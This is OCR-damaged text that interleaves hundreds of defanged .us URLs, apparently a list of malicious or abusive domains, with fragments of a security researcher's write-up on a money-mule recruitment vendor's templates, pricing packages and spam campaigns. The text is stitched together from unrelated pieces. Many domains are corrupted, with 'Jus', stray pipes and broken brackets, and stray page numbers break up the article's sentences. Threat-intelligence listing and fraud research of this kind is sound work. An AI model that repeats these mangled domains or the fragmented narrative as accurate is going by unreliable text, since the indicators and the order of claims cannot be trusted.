hxxp://uspslasw[.]us 
hxxp://uspspc[.]us 
hxxp://vibramfivefinger[.]us 
hxxp://upsetdirt[.]us 
hxxp://vectori[.]us 
hxxp://txperformancelubbock[.]Jus 
hxxp://venirmanire[.]us 
hxxp://trjeansoutlet[.Jus 
hxxp://unrecognizecredit[.]us 
hxxp://unixtrainingbysysed[.]us 
hxxp://veteranlawncare[.]us 
hxxp://watmunivongsa[.]us 
hxxp://websupply[.]us 
hxxp://wyzent[.]us 
hxxp://talentconnections[.]us 
hxxp://arameso[.]us 
hxxp://westpvp[.]us 
hxxp://capacityproductions[.]us 
hxxp://sanjoserealtor[.]us 
hxxp://sritutorials[.]us 
hxxp://newmutualismmapping[.]us 
hxxp://dimelight[.]us 
hxxp://awakeningministires[.]us 
hxxp://onsource[. ]us 
hxxp://precisioni[.]us 
hxxp://lightsonthehill[.]us 
hxxp://heroeslike[.]us 
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[1]Ah, deja vu! How is it possible that the [2]Scope Group money mule recruitment 
group acting as the employer for the interviewed mule has been "set up in 1990 in New York, 
the USA by three enthusiasts who have financial education" just like [3]AF-GROUP LLC and its 
portfolio of brands, whose 30k [4]botnet operations | exposed and took down in May, 2009, 
next to establishing a direct connection between the botnet and an [5]Ukrainian dating scam 
agency known as "Confidential Connections"? 
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Pretty simple - just like the efficiency-centered mentality applied in the [6]template-ization of 
[7]malware, the ongoing standardization of the money mule recruitment business model is 
resulting in a bogus brand portfolios using identical web site layouts next to the same copy 
writing materials offered by a single vendor exclusively working with money mule recruitment 
organizations only. A couple of years ago, the money mule recruitment process was largely 
inefficient due to the operational security applied - [8]not everyone could become a money 
mule unless certain criteria was met. A newly launched managed money mule recruitment 
design agency that I’ve been monitoring for a while, is poised to help cybercriminals achieve 
faster recruitment rates based on the cybercriminal-tailored services it’s offering. 
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hxxp://cargotrailer[.]us 
hxxp://claystore[.]us 
hxxp://enabortion[.]us 
hxxp://ppekitdirectsuppliers[.]us 
hxxp://cnin[.]us 
hxxp://airjordanonline[.Jus 
hxxp://pipercosplay[.Jus 
hxxp://sheasoft[.]us 
hxxp://uinghig[.]us 
hxxp://istapp[.]us 
hxxp://cityofmiltingsd[.Jus 
hxxp://brittanyandjesse[.]us 
hxxp://tecschool[.]Jus 
hxxp://thankrare[.]us 
hxxp://kientruc[.]us 
hxxp://sapphiremoon[.]us 
hxxp://priellif.]us 
hxxp://bouncinbin[. ]us 
hxxp://isigroup[.]us 
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hxxp://cousincare[.]us 
hxxp://angiesavage[.]us 
hxxp://prettylottlething[.]us 
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hxxp://importerkorjou[.]us 
hxxp://crossroadsonline[.]us 
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hxxp://resumaster[.]us 
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hxxp://laraandtom[.]us 
hxxp://ilovenative[.]us 
hxxp://portlandpreferred[.]us 
hxxp://banglamoviel[.]us 
hxxp://lowcostcarinsurance[.]us 
hxxp://seitrack[.]Jus 
hxxp://chinajerseyswholesaler[.]us 
hxxp://casemarine[.]us 
hxxp://parkdentalcar[.]us 
hxxp://powershoes[.]us 
hxxp://cyberaccess[.]us 
hxxp://moemoneymachine[.]us 
hxxp://schoolofdragonshack[.]us 
hxxp://voonti[.]us 
hxxp://carabermain[.]us 
hxxp://dunsregistered[.]us 
hxxp://drinkinggamesfor[.]us 
hxxp://theblunt[.]us 
hxxp://modernpools[.]us 
hxxp://monition[.]us 
hxxp://topdecorations[.]us 
hxxp://cabinetwarehouse[.]us 
hxxp://cortva[.]Jus 
hxxp://comfortcontrolcorp[.]us 
hxxp://corbinhunter[.]us 
hxxp://firstrefil.Jus 
hxxp://corporateplanners[.]us 
hxxp://fashioncouncil[.Jus 
hxxp://randellchal.Jus 
hxxp://fungirlz[.]us 
hxxp://eternityshoes[.]us 
hxxp://desmoinesjob[.]us 
hxxp://projectosaude[.]us 
hxxp://marionmarketing[.]us 
hxxp://supperzilla[.]us 
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hxxp://whilehanged[.]us 
hxxp://runelive[.Jus 
hxxp://thestrategygroup[.]us 
hxxp://forumfashionable[.]us 
hxxp://sbceilings[.]Jus 
hxxp://nflofficialsshop[.]us 
hxxp://superheroesamong[.]us 
hxxp://nebraskadeedonline[.]us 
hxxp://sadlovestory[.]us 
hxxp://everythingketo[.]us 
hxxp://ractivate[.]Jus 
hxxp://indigenoustweets[. ]us 
hxxp://bestpressonline[.]us 
hxxp://richarddreyfuss[.]us 
hxxp://portlandofficespaceforlease[.]us 
hxxp://procyonrising[.]us 
hxxp://sarahanddavidperry[.]us 
hxxp://everythinghasahome[.]us 
hxxp://diaperchange[.]us 
hxxp://recipestash[.]us 
hxxp://timexmens[.]us 
hxxp://designersaree[.]us 
hxxp://montirock[.]us 
hxxp://regulatorypro[.]us 
hxxp://cnaregistry[.]us 
hxxp://creaseguard[.]us 
hxxp://endabortio[.]us 
hxxp://privianet[.]us 
hxxp://healthonnet[.]Jus 
hxxp://dancetown[.]us 
hxxp://medicinalchemistry[.]us 
hxxp://realenergy[.Jus 
hxxp://divinedark[.]us 
hxxp://cityofcvancouver[.]us 


hxxp://cheapjordanssale[.]us 
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hxxp://catalinajaramillal[.]us 
hxxp://parkeople[.]Jus 
hxxp://picatello[.Jus 
hxxp://kidchen[.]us 
hxxp://picshot[.]us 
hxxp://dollarsmove[.]us 
hxxp://ikontechnologies[.]us 
hxxp://gucciusaoutletonline[.Jus 
hxxp://stockxjordan[.]us 
hxxp://onondagacountyl[.]us 
hxxp://southlandtv[.]us 
hxxp://laceylibertarian[.]us 
hxxp://studentnurse[. ]us 
hxxp://alicewonders[.]us 
hxxp://campfitness[.]us 
hxxp://severinal.]us 
hxxp://centrotela[.]us 
hxxp://greencardbacklog[.]Jus 
hxxp://goldkingz[.]us 
hxxp://digitalhandshake[.]us 
hxxp://strangevideos[.]us 
hxxp://dodlicenses[.]us 
hxxp://sophiaestrada[.]us 
hxxp://docmarketin[.]us 
hxxp://shoppingtreat[.]us 
hxxp://sewmall[.Jus 
hxxp://shecan[.]us 
hxxp://wholesalefreeshipping[.]us 
hxxp://vipphotobooth[.]us 
hxxp://strelka[.Jus 
hxxp://tranniesonline[.Jus 
hxxp://sneakeradd[.]us 
hxxp://sunrisesandsunsets[.]us 
hxxp://thelittlewoody[.]us 
hxxp://superappz[.]us 
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hxxp://thechurchonfire[.]us 
hxxp://todaysinsidenews|[.]us 
hxxp://tampashooters[.]us 
hxxp://sourceofsupply[.]us 
hxxp://venussecrets[.]us 
hxxp://topwebdesigns[.]us 
hxxp://strasburgbc[.]us 
hxxp://wiringelectric[.Jus 
hxxp://tortelico[.]us 
hxxp://toreigness[.]us 
hxxp://wedowedding[.]us 
hxxp://superiorlockandkey[.]us 
hxxp://theallamericansushi[.]us 
hxxp://trendyutility[.]us 
hxxp://stllocallocksmith[. Jus 
hxxp://stonetile[.]us 
hxxp://temaril[.]us 
hxxp://vindica[.]us 
hxxp://whenwillitend[.]us 
hxxp://urgekatespade[.]us 
hxxp://tenbrook[.]us 
hxxp://yeezyshoesforsale[.]us 
hxxp://zeromouthwash[.]us 
hxxp://monkiworld[.]us 
hxxp://healthill[.Jus 
hxxp://greeenpan|[.]us 
hxxp://dezbryantjerseys[.]us 
hxxp://luncountynm[.]us 
hxxp://pollacio[.]us 
hxxp://lastae[.]us 
hxxp://fsyimwhz[.]us 
hxxp://kristianjackson[.]us 
hxxp://exclusivefashionclub[.]us 
hxxp://wokelly[.]us 
hxxp://strollergym[.]us 
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hxxp://upstatemultisport[.]us 
hxxp://calverylive[.]us 
hxxp://drcallcente[.]Jus 
hxxp://aikahielementary[.]us 
hxxp://arrseadefense[.]us 
hxxp://akerbrands[.]us 
hxxp://altoalliance[.]us 
hxxp://afearphonemall[.]us 
hxxp://arefound[.]us 
hxxp://alamanceconservative[.]us 
hxxp://adelita[.]us 
hxxp://aquiver[.]us 
hxxp://aviationattorney[.]us 
hxxp://aandrconcrete[.]us 
hxxp://beyondthecounter[. Jus 
hxxp://backfiretimes[.]us 
hxxp://bernedoodles[.]us 
hxxp://barnstablema[.]us 
hxxp://bizarfinancing[.]us 
hxxp://bluecar[.]us 
hxxp://buenosairesbistro[.]us 
hxxp://breatheagain[.]us 
hxxp://carterproperty[.]us 
hxxp://biometricsolutions[.]us 
hxxp://carolcares[.]us 
hxxp://canaryinsurancesolutions[.]us 
hxxp://borderbangers[.]us 
hxxp://cannonvalleyvet[.]Jus 
hxxp://carbonverde[.]us 
hxxp://chrisdrewconsulting[.]us 
hxxp://crunchyricemedial[.]us 
hxxp://computerpartsdirect[.]us 
hxxp://dealsmaster[.]us 
hxxp://datamash[.]us 
hxxp://comsystems[.]us 
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hxxp://covanafashion[.]us 
hxxp://couponfinder[.]us 
hxxp://clackamass[.]us 
hxxp://deltaforcestore[.]us 
hxxp://cilantrogloball[.]Jus 
hxxp://clarityretreat[.Jus 
hxxp://globaliv[.]us 
hxxp://furnitureforpatio[.]us 
hxxp://fireworkssandbox[.]us 
hxxp://fendishirt[.]us 
hxxp://frailty[.]us 
hxxp://globalanalytics[.]us 
hxxp://domthediabet[.]us 
hxxp://exterra[.]Jus 
hxxp://firstamerinetdemosite[.]us 
hxxp://formeducorps[.]Jus 
hxxp://dreamsroofing[.]us 
hxxp://dukerewards[.]us 
hxxp://dinadogs[.]us 
hxxp://eydenwellness[.]us 
hxxp://dnnadvertising[.]us 
hxxp://ferragamoshoessale[.]us 
hxxp://goodlesselectric[.]us 
hxxp://gregoryfalatek[.]Jus 
hxxp://greatmindstechnology[.]us 
hxxp://itsgametime[.]us 
hxxp://hippieteahealingcentre[.]us 
hxxp://heartlandfolk[.]Jus 
hxxp://neartmindspirit[.]us 
hxxp://ibestreviews[.]us 
hxxp://jeremyrenner[.]Jus 
hxxp://jkproperties[.]us 
hxxp://houstonkayaktour[. ]us 
hxxp://irvportall[.]Jus 


hxxp://homekind[.]Jus 
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hxxp://harlandschools[.Jus 
hxxp://kintex[.]us 
hxxp://iriontx[.Jus 
hxxp://happilyeveredwardsl[.]us 
hxxp://mediarescue[.]us 
hxxp://lowstar[.]us 
hxxp://liverflush[.]us 
hxxp://marketsuper[.]us 
hxxp://letsscale[.Jus 
hxxp://louboutinredbottomsshoes|[. ]us 
hxxp://mcgregorvsmayweather[.]us 
hxxp://kyriesirvingshoes[.]us 
hxxp://tonicbrand[.]us 
hxxp://targetmedial[.]us 
hxxp://technomediahub[.]us 
hxxp://vitalreds[.]us 
hxxp://wastegeeks[.]us 
hxxp://timberlandblackshoes[.]Jus 
hxxp://swbizserv[.]us 
hxxp://warezrock[.]us 
hxxp://talaatmoustafal.]us 
hxxp://visager[.]us 
hxxp://villagecoffee[.]us 
hxxp://thedesertfactory[.]us 
hxxp://subirimagenes[.]us 
hxxp://wirelessearpxal.]us 
hxxp://socalasta[.]us 
hxxp://wargamingwest[.]us 
hxxp://wondergold[.]us 
hxxp://topmartialarts[.Jus 
hxxp://supersonicbionic[.]us 
hxxp://zeronavitamin[.]us 
hxxp://thehomefront[.]us 
hxxp://westjordanshoesl[. ]us 
hxxp://weaselzipers[.]us 

26850 


hxxp://temploancestraldelamaor[.]us 
hxxp://terryburns[.]us 
hxxp://truedevicentaggil[.]us 
hxxp://trinityecchurch[.Jus 
hxxp://trinitylabs[.]Jus 
hxxp://tranquilitymusic[.]us 
hxxp://yoursdailyhealthcare[.]us 
hxxp://wesfarmers[.]us 
hxxp://lightandlamps[.]us 
hxxp://linguis[.]us 
hxxp://listenwith[. Jus 
hxxp://millennialfuture[.]us 
hxxp://justalkin[.Jus 
hxxp://laserinertialfusionenginel[.]Jus 
hxxp://kelleypacker[.]us 
hxxp://ineedfabric[.]us 
hxxp://jstaffarchitect[.]us 
hxxp://lecentredebeaute[.]us 
hxxp://lemonbite[.]us 
hxxp://joinmcamotorclubofamerica[.]us 
hxxp://inclusivetransactions[.]us 
hxxp://miserable[.]Jus 
hxxp://medcarecredit[.]us 
hxxp://microsdigital[.Jus 
hxxp://lamexfood[.]us 
hxxp://irank[.]us 
hxxp://kentuckyville[.Jus 
hxxp://mountainears[.]us 
hxxp://povision[.]us 
hxxp://rendezvouscafeandwinebar[.]us 
hxxp://pandorajewelryofficalsite[.]us 
hxxp://myfinancialliteracylab[.]us 
hxxp://offwhiteshoesclothing[.]us 
hxxp://officialchiefsshop[.]us 
hxxp://pocketscent[.]us 
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hxxp://popthechampane[.]us 
hxxp://nxshou[.]us 
hxxp://pandorastorejewelry[.]us 
hxxp://profiter[.]us 
hxxp://nationalunityplatform[.]Jus 
hxxp://publicservant[.]us 
hxxp://netwaredesk[.]us 
hxxp://myfloridaproperties[.]us 
hxxp://newlifechristian[.]us 
hxxp://righttobeararms[.]us 
hxxp://rawling[.]Jus 
hxxp://pureencapsulations[.]us 
hxxp://runawaystyles[.]us 
hxxp://quadcountylandfill[.]Jus 
hxxp://premiumconsultingcor[.]us 
hxxp://optilinl[.Jus 
hxxp://ourcleaningservices[.]us 
hxxp://residentialenergy[.]us 
hxxp://saintssyt[.]us 
hxxp://sandboxcooltools[.]us 
hxxp://scenicroutes[.]us 
hxxp://screentools[.]Jus 
hxxp://scintillating[.Jus 
hxxp://serigrafia[.]us 
hxxp://thetrueloves[.]us 
hxxp://thewishingwell[.]us 
hxxp://takingback[.]us 
hxxp://thestorm[.]us 
hxxp://sueyourhoacheaply[.]Jus 
hxxp://threadtank[.]us 
hxxp://tuonline[.Jus 
hxxp://vanderslicefamily[.Jus 
hxxp://webwiseblactinoentertainment[.]us 
hxxp://unipartner[.]Jus 
hxxp://wellspoken[.]us 
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Whereas it’s been operating beneath the radar for several years, exclusively serving known 
and trusted cybercriminals, it’s recent mainstream business model is a great example of a 
timely underground market proposition due to the fact that the current economic climate best 
suits the money mule recruitment business model due to its high commissions for processing 
fraudulently obtained money. 


Integrity Group Inc = co hes 


© Services > - 
y BC business solutions 


© News = Fresh Ideas for your 


™ success! 


Do you infiltrate the entire assembly line, or do you assess the final product? Appreciate my 
rhetoric as usual, it’s full disclosure time, hence infiltrating the assembly line. 


In this post, we'll take a look at five templates offered by the managed money mule re- 
cruitment vendor, assess several of their customers currently using them to launch targeted 
and localized to German spam campaigns aiming to recruit new money mules, expose their 
entire domains portfolio and associated emails used for correspondence with prospective 
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hxxp://smartacoupe[.]us 
hxxp://verseis[.]us 
hxxp://understandingthebible[.]us 
hxxp://thebluefairy[.]us 
hxxp://uggbootsoutletstores[.]us 
hxxp://twocanes[.]us 
hxxp://vastaccessories[.]us 
hxxp://xensele[.]us 
hxxp://ytwsshop[.]us 
hxxp://optiomovill.]us 
hxxp://readycode[.]us 
hxxp://samcompany[.]us 
hxxp://samsautosales[.]us 
hxxp://resiliencelabs[.]us 
hxxp://questcards[.]us 
hxxp://sapereaude[.]us 
hxxp://premiernissan[.]us 
hxxp://nextcall[.Jus 
hxxp://propertypickers[.]us 
hxxp://saintbarnabaschurch[.]us 
hxxp://roombank[.]us 
hxxp://proent[.]Jus 
hxxp://nextlevelevents[.]us 
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hxxp://oakleyfrogskinscheap[.]us 
hxxp://restyling[.]us 
hxxp://onceuponwedding[.]us 
hxxp://saeessentials[.]us 
hxxp://realtortips[.]Jus 
hxxp://nationalsproshop[.]us 
hxxp://nitrogeni[.]us 
hxxp://peterlondon[.]Jus 
hxxp://seasprich[.]us 
hxxp://protectpainting[.]us 
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hxxp://houselight[.]Jus 
hxxp://iamanamerican[.]us 
hxxp://maiditsparkle[.]Jus 
hxxp://hirepower[.]us 
hxxp://ludmann[.]Jus 
hxxp://mastersteam[.]us 
hxxp://marrprof[.Jus 
hxxp://jnshost[.]us 
hxxp://lanyon[.]us 
hxxp://homemobelideen|[.]us 
hxxp://languagecentrall[.]us 
hxxp://isprout[.]us 
hxxp://industrynewsdaily[.]us 
hxxp://mindgears[.]us 
hxxp://lithuanianclub[.]us 
hxxp://hardbeauty[.]us 
hxxp://kcwarter[.]us 
hxxp://healingforlife[.Jus 
hxxp://intimatepersonals[.]us 
hxxp://haraflow[.]us 
hxxp://mescieng[.]us 
hxxp://ipotecalatina[.]us 
hxxp://lookinginside[.]us 
hxxp://mkoutletdiscount[.]us 
hxxp://mitchrice[.]us 
hxxp://mountainupl[.]us 
hxxp://trygetitfree[.Jus 
hxxp://callipygiane[.]us 
hxxp://albersons[.]us 
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money mules. 


Moreover, we'll actually attempt to becoming a money mule by interacting with their 
market proposition, obtain the financial agent agreements, and expose little known facts 
about how sophisticated and social-engineering oriented the entire money mule recruitment 
process really is. 


THANK YOU FOR YOUR BUSINESS 


For starters, here’s how the service describes itself, and what type of packages it offers to 
prospective money mule recruiters. The less sophisticated package is offered for $900 and 
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hxxp://sigchain[.]us 
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hxxp://shoesiteformen[.]us 
hxxp://pedalturner[.]Jus 
hxxp://sandboxyotpo[.]us 
hxxp://silkwallpapers[.]us 
hxxp://radshop[.]us 
hxxp://seniorlifeandhealth[.]Jus 
hxxp://shorelineapps[.]us 
hxxp://pandorajewelryofficial[.]us 
hxxp://personalresultcoachl[.]us 
hxxp://rapidautomation[.]us 
hxxp://amaterialworld[.]us 
hxxp://istargloball[.]Jus 
hxxp://lifestyleessentials[.Jus 
hxxp://astepabovel[.]us 
hxxp://timelessstonedemexicl.]us 
hxxp://diymarriagecounseling[.]us 
hxxp://localhostom[.]Jus 
hxxp://timdeale[.Jus 
hxxp://theairwheell[.]us 
hxxp://buckselectric[.]us 
hxxp://dcollins[.]us 
hxxp://stonerush[.]Jus 
hxxp://dualcameras[.]us 
hxxp://australianproducts[.]us 
hxxp://blisshairstudio[.]us 
hxxp://amiejoanscentsy[.]us 
hxxp://livebridge[.]us 
hxxp://colonialroofing[.Jus 
hxxp://familyvsstate[.]Jus 
hxxp://homeio[.]us 
hxxp://medicaidplanning[.]us 
hxxp://philliesproshop[.]us 
hxxp://mcscleaningservices[.]us 
hxxp://accurateinfo[.]us 
hxxp://bsainc[.Jus 
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the corporate version goes for $1700. 


The first one offers the following: 
- fake company site in English 
- template-based correspondence letters for the entire process 


- the entire document required for the process, custom forms, contracts, invoice applica- 
tions etc. 


- a teach-yourself manual including advice and recommendations - available in English 
and Russian 


- sample spam letters in TXT and HTML, in English only 


The corporate version offers the following: 


- fake company site in several languages, for instance, Dutch, German, Bulgarian, Italian 
etc. 


- fake signatures representing the CEO, accounts manager etc. 
- multiple spam letters in different languages 
- managed domain hosting 


- answering machine number as well as a paid Skype subscription as a bonus 


The following are some of the templates - blurred by the vendor in order to protect the 
bogus brands portfolio - currently offered by the service. Three of the templates are already 
in circulation, that means active spamming in Italian and German "offering the Moon", and 
asking for your identity and financial reputation: 
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hxxp://patriothistory[.]us 
hxxp://ethosparis[.]Jus 
hxxp://wattmeter[.]us 
hxxp://marketingcommando[.]us 
hxxp://azstorageall[.]us 
hxxp://cachecraft[.]Jus 
hxxp://rockymountaingrill[.Jus 
hxxp://conversiontechnologies[.]us 
hxxp://totalgp[.Jus 
hxxp://emojipaste[.]us 
hxxp://fashionchamp[.]us 
hxxp://dndmarketing[.]us 
hxxp://deptofmoralhealth[.]us 
hxxp://devcamperapi[.]us 
hxxp://mysparocket[.]us 
hxxp://bellafx[.]us 
hxxp://mediawerkz[.]us 
hxxp://shannonandanthony[.]us 
hxxp://harrystours[.]us 
hxxp://rideready[.]Jus 
hxxp://potockiheatingandair[.]us 
hxxp://elliptisafe[.Jus 
hxxp://silverdalepetgrooming[.]us 
hxxp://uhnwsupport[.]us 
hxxp://shoppingconstruct[.]us 
hxxp://tactserv[.Jus 
hxxp://sintergeticausal[.]us 
hxxp://writingcommission[.]us 
hxxp://beyoncetour[.]us 
hxxp://capitoltransportation[.]us 
hxxp://tomashl[.]us 
hxxp://emmastehli[.]us 
hxxp://mandeco[.]us 
hxxp://recordtin[.Jus 


hxxp://playforplenty[.]Jus 
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hxxp://patriotresources[.]us 
hxxp://omascottage[.]us 
hxxp://toonsday[.]us 
hxxp://voteregistration[.]us 
hxxp://whoarethey[.]us 
hxxp://bdmautoparts[.]us 
hxxp://astoundstudiosllc[.Jus 
hxxp://meettheforemans[.]us 
hxxp://nwarren[.]us 
hxxp://sackman|[.]us 
hxxp://undergroundcity[.]us 
hxxp://sbfashion[.]us 
hxxp://wasteawayvalet[.]us 
hxxp://venturefunds[.]us 
hxxp://californiavsucla[.]us 
hxxp://shopbetterwith[.]us 
hxxp://farity[.]us 
hxxp://kingdomkidentrepreneur[.]us 
hxxp://soontobemcleans[.]us 
hxxp://tacticaldeals[.]us 
hxxp://smallbusinessenvironment[.]us 
hxxp://opinioncity[.]us 
hxxp://opportly[.]us 
hxxp://rohitileandmarble[.]us 
hxxp://zenfitnate[.]us 
hxxp://arthurbrownandbro[.]us 
hxxp://topshelfapparell.Jus 
hxxp://elitesa[.]Jus 
hxxp://lashesfordays[.]us 
hxxp://laserquest[.]us 
hxxp://newtonhome[.]us 
hxxp://cintopul.]us 
hxxp://kendallwatch[.]us 
hxxp://munroclan[.]us 
hxxp://fitexpress[.]us 
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hxxp://fotored[.]us 
hxxp://salingerhotell[.]us 
hxxp://ricanslounge[.]us 
hxxp://videosgratis[.]us 
hxxp://thegentlemansalon[.]us 
hxxp://herbngardens[.]us 
hxxp://realestatephoto[.]us 
hxxp://seattleoutdoors[.]us 
hxxp://societyclothing[.]us 
hxxp://salescheap[.]us 
hxxp://ranseycounty[.]us 
hxxp://appofapprovall.]us 
hxxp://oklahomasoonersfootball[.]us 
hxxp://yourchecksfromlivingroom[.]us 
hxxp://barragans[.]us 
hxxp://diapercoupons[.]us 
hxxp://miniaturepinscherpuppies[.]us 
hxxp://whitneypowers[.]us 
hxxp://travelfor[.Jus 
hxxp://mlbcardinalsproshop[.]us 
hxxp://theinsuranceoutlet[.]us 
hxxp://fnbprivateonlinel[.]us 
hxxp://lubereport[.]us 
hxxp://sellyourstuff[.]us 
hxxp://stadeos[.]us 
hxxp://gosalefashion[.]us 
hxxp://sardiniapd[.]us 
hxxp://troyingram[.]us 
hxxp://panicorganic[.]us 
hxxp://lorita[.Jus 
hxxp://mruncheat[.]us 
hxxp://saucepeanat[.]us 
hxxp://bestonhawaiil.]us 
hxxp://buildmyowncard[.]us 


hxxp://delhimasalal[.]us 
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hxxp://damascususa[. ]us 
hxxp://coolchoices[.]us 
hxxp://frcreed[.Jus 
hxxp://carsana[.]us 
hxxp://boatingresouces[.]us 
hxxp://istitchandprint[.]us 
hxxp://leaveforer[.]us 
hxxp://investigativerisk[.]us 
hxxp://keydirect[.]us 
hxxp://sandownnh[. ]us 
hxxp://viice[.Jus 
hxxp://nucrcertificates[.]us 
hxxp://shoppingstop[.]us 
hxxp://underdogmedial[.]us 
hxxp://sydneyrichards[.]us 
hxxp://berserkervent[.]us 
hxxp://sasconstruction[.]us 
hxxp://driveenergyl[.]us 
hxxp://whintdml[.]us 
hxxp://webcamarmy[.]us 
hxxp://statear[.]us 
hxxp://bitcointime[.Jus 
hxxp://williamsonhigh[.]us 
hxxp://togetherfor[.Jus 
hxxp://shopboholo[.]Jus 
hxxp://highgradeserver[.]us 
hxxp://challenj[.Jus 
hxxp://mercantilevenue[.]us 
hxxp://innovateindependent[.]us 
hxxp://attainica[.Jus 
hxxp://silverhost[.]us 
hxxp://paulandryan[.]us 
hxxp://conciseconsulting[.]us 
hxxp://firefoxhelp[.]us 
hxxp://imagelink[.Jus 
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hxxp://krugfowisconsin[.]us 
hxxp://nowtojumphigher[.]us 
hxxp://darknetlive[.]us 
hxxp://montereyco[.]us 
hxxp://tylerjones[.]Jus 
hxxp://nationalproperties[.]us 
hxxp://facesofmaine[.]us 
hxxp://pearldentalstudio[.]us 
hxxp://ionnelkorsoute[.]us 
hxxp://booksandgifts[.]us 
hxxp://lyceeyersin[.]us 
hxxp://paritysolar[.]us 
hxxp://allprep[.]Jus 


hxxp://innovationtechnologies[.]us 


hxxp://federaljobdirectory[.]us 
hxxp://dronedepot[.]Jus 
hxxp://vmconnect[.]Jus 
hxxp://futurefunders[.]us 
hxxp://americasnature[.]us 
hxxp://hhiconsulting[.]us 
hxxp://carestreet[.]us 
hxxp://photoalert[.]us 
hxxp://ncfence[.]us 
hxxp://calrisprosuppIment[.]us 
hxxp://nousecontractor[.]us 
hxxp://christembassy[.]us 
hxxp://longhorngallery[.]us 
hxxp://calclassics[.]us 
hxxp://etelectricservices[.]us 
hxxp://thepawnshoppe[.]us 
hxxp://flicktor[.]us 
hxxp://cementcreekcondos[.]us 
hxxp://streetleagall.Jus 
hxxp://gratitudechallenge[.]Jus 


hxxp://mountainmachines[.]us 


26877 


hxxp://homebuyerswebiner[.]us 
hxxp://afriqjmarbritrage[.]us 
hxxp://alleghenyvourts[.]us 
hxxp://accountmyutility[.]us 
hxxp://clarkcountycler[.]us 
hxxp://chatic[.]us 
hxxp://coloradosupremecourts[.]us 
hxxp://candycoated[.]us 
hxxp://connollysminted[.]us 
hxxp://bobchacha[.]us 
hxxp://createbeauty[.]us 
hxxp://elinmigrante[.Jus 
hxxp://distinctiveconcrete[.]us 
hxxp://earthkeeperorganics[.]us 
hxxp://fortnightoffers[.]us 
hxxp://cottoncandyfactory[.]us 
hxxp://galtvillas[.]us 
hxxp://fightorflighttactical[.Jus 
hxxp://courageousstepmamal.]us 
hxxp://girlmagazine[.]us 
hxxp://fitable[.]us 
hxxp://handybnb[.]us 
hxxp://gnnetcom[.]us 
hxxp://nhomeawayfromhomechildcare[.]us 
hxxp://landofchrist[.]us 
hxxp://libertytracker[.Jus 
hxxp://himalayancraft[.]Jus 
hxxp://kansascityflagfootball[.]us 
hxxp://honlee[.]Jus 
hxxp://icarzon[.]us 
hxxp://labnutrition[.]us 
hxxp://laversilles[.Jus 
hxxp://Industrialcs[.]Jus 
hxxp://mardigrasapparell[.]us 
hxxp://miinted[.]us 
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hxxp://nocreditcheckapartment[.]Jus 
hxxp://maciant[.]us 
hxxp://morefreetime[.]us 
hxxp://mfhelpcare[.]Jus 
hxxp://reallyshome[.]us 
hxxp://rachelleandjustin[.Jus 
hxxp://phoenixwindowtinting[.]us 
hxxp://plovers[.]us 
hxxp://photopeal[.]us 
hxxp://thewatchmusic[.]us 
hxxp://unitedindependence[.]us 
hxxp://thekellyboys[.]us 
hxxp://ujscourts[.]us 
hxxp://somethingherball[.]Jus 
hxxp://wavelinkcommunications[.]us 
hxxp://tellaladi[.Jus 
hxxp://thecloudproject[.]Jus 
hxxp://thebrewmanclan[.]us 
hxxp://ersoccer[.]us 
hxxp://cheapdesignerbagsoutlet[.]us 
hxxp://asianbistro[.]us 
hxxp://bestcymbidium[.]us 
hxxp://lastnof[.]Jus 
hxxp://qualitybarber[.]Jus 
hxxp://schraders[.]us 
hxxp://sonomastatezoom|. ]us 
hxxp://densurefir[.]us 
hxxp://aviationgeeks[.]us 
hxxp://atozroofing[.]us 
hxxp://axiomccil[.]us 
hxxp://ayloo[.]us 
hxxp://bakersfieldcitu[.]us 
hxxp://alleghycourts[.]Jus 
hxxp://alphainvestmentcasting[.]us 


hxxp://babyisland[.]us 
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hxxp://artiopharmal[.]us 
hxxp://bdinnovations[.]us 
hxxp://blainechurch[.]us 
hxxp://artikelindonesial[.]us 
hxxp://airtravelmaxblog[.]us 
hxxp://anokaco[.]us 
hxxp://apphks[.]us 
hxxp://aquacarwash[. Jus 
hxxp://adicorp[.]us 
hxxp://airsa[.]us 
hxxp://adriahomedecor[.]us 
hxxp://actuarialexamprep[.]us 
hxxp://adamlehman[.]us 
hxxp://aaaviptaxil[.]us 
hxxp://villagemotorsale[.]Jus 
hxxp://superbowlfans[.]us 
hxxp://westernrifleahooters[.]us 
hxxp://yourhunt[.]us 
hxxp://worshiprehab[.]us 
hxxp://olangall.]Jus 
hxxp://marinerslanding[.]us 
hxxp://officialnhihome[.]us 
hxxp://nofficecom[.]us 
hxxp://vaasvalves[.]us 
hxxp://optreum[.]us 
hxxp://sercurtell[.Jus 
hxxp://pandoraclearancecharms[.]us 
hxxp://ozek[.]us 
hxxp://samplefor[.]us 
hxxp://respectyourtemple[.]us 
hxxp://sunglasssale[.]us 
hxxp://nhamambocegil.]Jus 
hxxp://gdgml[.]us 
hxxp://heelsqueen[.]us 
hxxp://iimcraneservices[.]us 
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hxxp://realestateradio[.]us 
hxxp://adeogranite[.]us 
hxxp://centizz[.]Jus 
hxxp://breckforalaska[.]us 
hxxp://arvancloud[.]us 
hxxp://yeasport[.]us 
hxxp://togethertechnologies[.]us 
hxxp://thesuicidesquadfull[.]Jus 
hxxp://northamericanrugbyunio[.]us 
hxxp://protignis[.]us 
hxxp://santibudayadanceinfo[.]us 
hxxp://nocodeframework[.]us 
hxxp://steponecarhauler[.]us 
hxxp://wearerbd[.]us 
hxxp://amercanstatenationals[.]us 
hxxp://welllath[.]us 
hxxp://pssist[.]us 
hxxp://heatIlhyhormones[.]us 
hxxp://mintmaid[.]Jus 
hxxp://suppersunglasses[.]us 
hxxp://parmark[.]us 
hxxp://justingredents[.]us 
hxxp://wassh[.]us 
hxxp://jrwaxandmorescency|[.]us 
hxxp://casinoalerts[.]us 
hxxp://cheapbrownsjerseys[.]us 
hxxp://cellulitehometreatments[.]us 
hxxp://theqtbug[.]us 
hxxp://walsingham[.]us 
hxxp://wolfshield[.]us 
hxxp://americanoutlawjeepparts[.]us 
hxxp://launchaproduct[.]us 
hxxp://freebikes[.]us 
hxxp://daystarsupplies[.]us 


hxxp://antiquesbyme[.]us 
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hxxp://ggucilllvvh[.]Jus 
hxxp://ambalasweet[.]us 
hxxp://socialmediafamo[.]us 
hxxp://mybical[.]us 
hxxp://monarchmentoring[.]us 
hxxp://receivedsstrangeworld[.]us 
hxxp://defenseindustries[.]us 
hxxp://toyrider[.]us 
hxxp://densurfit[.]Jus 
hxxp://illinoisdistrict[.]us 
hxxp://crystalland[.]us 
hxxp://ramseycountysherif[.]us 
hxxp://sectionlaw[.]us 
hxxp://sanjosestables[.]us 
hxxp://timbotsale[.]us 
